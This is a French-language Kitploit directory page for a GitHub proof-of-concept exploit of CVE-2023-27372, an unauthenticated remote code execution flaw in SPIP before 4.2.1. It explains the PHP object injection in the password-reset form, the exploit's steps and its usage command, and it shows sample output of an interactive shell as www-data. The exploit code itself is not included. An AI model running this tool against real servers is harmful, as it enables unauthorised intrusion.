Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC — Vulnérabilité d'exécution de code à distance non authentifiée dans SPIP avant la version 4.2.1. | Kitploit
Outils/GitHubGitHub/estebanzarate/cve-2023-27372-spip-4.2.1-unauthenticated-rce-poc
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubestebanzarate/cve-2023-27372-spip-4.2.1-unauthenticated-rce-poc

CVE-2023-27372-SPIP-4.2.1-Unauthenticated-RCE-PoC

Vulnérabilité d'exécution de code à distance non authentifiée dans SPIP avant la version 4.2.1.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 5 moisPas encore vérifié

CVE-2023-27372 — SPIP < 4.2.1 RCE non authentifié (PoC)

Vulnérabilité d'exécution de code à distance non authentifiée dans SPIP avant 4.2.1. Le paramètre oubli du formulaire de réinitialisation de mot de passe est vulnérable à une injection d'objet PHP en raison d'une désérialisation mal gérée. Une charge utile sérialisée spécialement conçue est exécutée côté serveur en tant qu'utilisateur web, et la sortie est reflétée dans la réponse dans la valeur du champ de saisie oubli.


Comment ça fonctionne

  1. Récupère le jeton anti-CSRF depuis /spip.php?page=spip_pass.
  2. Envoie une requête POST avec une charge utile PHP sérialisée injectée dans le paramètre oubli.
  3. Extrait la sortie de la commande depuis l'attribut value reflété dans la réponse.
  4. Boucle pour une exécution interactive de commandes, en actualisant le jeton CSRF à chaque requête.

Prérequis

  • Python 3
  • Installer les dépendances :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

Utilisation

root@kitploit:~
python3 exploit.py -u http://TARGET/spip

Exemple :

root@kitploit:~
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Fetching anti-CSRF token...
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

Références

  • CVE-2023-27372
  • PoC original de nuts7
  • Notes de version de SPIP

Crédits

  • Découverte et exploit original : nuts7
  • Nettoyage et shell interactif : Esteban Zárate
Télécharger l’outil